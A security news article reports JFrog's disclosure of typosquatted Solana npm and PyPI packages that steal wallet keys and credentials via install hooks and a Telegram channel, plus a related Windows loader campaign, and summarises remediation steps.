What Are the Risks of Using Fake Solana Packages?

The attack exploited developer trust by disguising malicious libraries as legitimate Solana SDK tooling and build-fix patches. Packages such as @solana-labs/web3-js, @solana-labs/ancor, and @solana-labs/spl-toke used typosquatting and fake branding to lure victims, according to JFrog's findings. A threat actor operating under the handle "PassWord1337" promoted the packages by opening GitHub issues in open-source projects, falsely claiming the libraries resolved common build errors.

On the npm side, packages executed malicious JavaScript immediately upon installation through lifecycle hooks, requiring no further action from the developer. The malware configured a Telegram-based command-and-control channel and swept the local system for high-value files, including Solana keypair files (id.json), .env files containing environment variables, and AWS credential stores.

PyPI variants took a slightly different approach, embedding their payload in the package's initialization file so it activated when a developer imported the library during testing or application startup. The Open Source Vulnerabilities database confirmed that affected PyPI packages exfiltrated credentials, SSH keys, and crypto wallet data, and established persistence through cronjobs.

All stolen data was sent in real time to an attacker-controlled Telegram bot, bypassing traditional domain-based detection methods.

JFrog researchers also identified a secondary campaign running alongside FakeFix. Uploaded by a user called "thermonuclear," CMS-themed npm packages such as cms-storehub functioned as Windows loaders and droppers. These packages used hidden PowerShell scripts to install the Deno JavaScript runtime, which then executed remote code. The obfuscated payload established persistence through Windows Registry keys and communicated with a command-and-control server using JSON Web Tokens.

JFrog recommends that affected developers immediately remove all identified packages from developer machines, build workers, and internal caches. Because backdoor commands and registry persistence may already have been executed, the firm urges teams to rebuild CI runners from trusted images and hunt for persistence artifacts, including unauthorized Registry Run keys and rogue startup scripts. Developers should also rotate any Solana wallets, AWS credentials, SSH keys, and other secrets that may have been exposed.

The disclosure adds to an escalating wave of supply chain attacks targeting the cryptocurrency development ecosystem. Weeks earlier, security firm Socket uncovered a separate 34-package campaign called TrapDoor that similarly targeted Solana, Sui, and Aptos developers across npm, PyPI, and Crates.io.